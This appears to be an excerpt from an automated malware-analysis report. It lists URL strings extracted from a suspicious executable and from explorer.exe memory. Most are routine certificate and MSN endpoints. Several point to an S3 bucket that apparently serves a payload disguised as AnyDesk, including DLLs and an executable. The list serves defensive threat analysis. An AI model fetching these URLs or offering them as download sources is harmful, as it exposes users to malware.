Source: explorer.exe, 0000000C.00000000.2022719564.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048969994.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048969994.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2022719564.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2750262921.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2125286461.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2124360952.00000000090B2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2122983745.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2130807598.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2126233626.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2146195587.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.00000000090A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: nrGkqbCyKP.exe, libcef.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: nrGkqbCyKP.exe, libcef.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: libcef.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: nrGkqbCyKP.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: nrGkqbCyKP.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: explorer.exe, 0000000C.00000000.2022719564.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048969994.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048969994.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2022719564.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048969994.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2022719564.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2750262921.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2125286461.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2124360952.00000000090B2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2122983745.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2130807598.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2126233626.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2146195587.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.00000000090A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: nrGkqbCyKP.exe, libcef.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: nrGkqbCyKP.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: nrGkqbCyKP.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: explorer.exe, 0000000F.00000003.2065246181.0000000004B58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://n.ad8j
Source: explorer.exe, 0000000F.00000003.2065246181.0000000004B64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.ad
Source: explorer.exe, 0000000F.00000003.2065246181.0000000004B64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.ado
Source: explorer.exe, 0000000C.00000002.2046865328.0000000004405000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe
Source: explorer.exe, 0000000F.00000003.2065246181.0000000004B64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.
Source: explorer.exe, 0000000F.00000003.2065246181.0000000004B64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c
Source: explorer.exe, 0000000F.00000003.2065246181.0000000004B64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.co
Source: explorer.exe, 0000000C.00000000.2019785320.0000000004405000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobeS
Source: nrGkqbCyKP.exeString found in binary or memory: http://ocsp.comodoca.com0
Source: nrGkqbCyKP.exe, libcef.0.drString found in binary or memory: http://ocsp.digicert.com0
Source: nrGkqbCyKP.exe, libcef.0.drString found in binary or memory: http://ocsp.digicert.com0A
Source: nrGkqbCyKP.exe, libcef.0.drString found in binary or memory: http://ocsp.digicert.com0C
Source: nrGkqbCyKP.exeString found in binary or memory: http://ocsp.digicert.com0O
Source: nrGkqbCyKP.exe, libcef.0.drString found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 0000000C.00000002.2048969994.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2022719564.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: nrGkqbCyKP.exeString found in binary or memory: http://ocsp.sectigo.com0
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s3-r-w.ap-east-1.amazonaws.com
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s3-r-w.ap-east-1.amazonaws.comd
Source: explorer.exe, 0000000C.00000000.2021531603.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.2046017334.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048244736.0000000007720000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.11.drString found in binary or memory: http://upx.sf.net
Source: nrGkqbCyKP.exe, libcef.0.drString found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 0000000C.00000000.2022719564.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048969994.0000000009237000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
Source: explorer.exe, 0000000C.00000000.2025979008.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2053283744.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 0000000C.00000000.2025979008.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2053283744.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000000C.00000000.2025979008.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2053283744.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSA4
Source: explorer.exe, 0000000C.00000000.2025979008.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2053283744.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSd
Source: nrGkqbCyKP.exeString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/(
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/MSVCP140.dll
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/VCRUNTIME140.dll
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/aut.png
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.00000000029EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/libcef.dll
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/vcruntime140_1.dll
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/view.png
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/zfon.exe
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.comH
Source: explorer.exe, 0000000C.00000000.2020477282.000000000702D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.000000000702D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2750262921.0000000008F1E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2146195587.0000000008F1E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2123363356.0000000008F79000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.0000000008F1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2123363356.0000000008FFF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007793000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000C.00000002.2048969994.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2022719564.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
Source: explorer.exe, 0000000F.00000003.2146195587.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2126404678.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2123908196.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2125286461.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2750262921.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.000000000906A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?l
Source: explorer.exe, 0000000C.00000000.2022719564.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048969994.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2130807598.0000000009091000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2125286461.0000000009091000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2146195587.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2750262921.0000000009085000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2122983745.000000000908A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2126233626.0000000009091000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000C.00000000.2022719564.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048969994.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comW
Source: explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
Source: explorer.exe, 0000000C.00000002.2053283744.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2025979008.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2126404678.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2123908196.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2125286461.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.000000000906A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
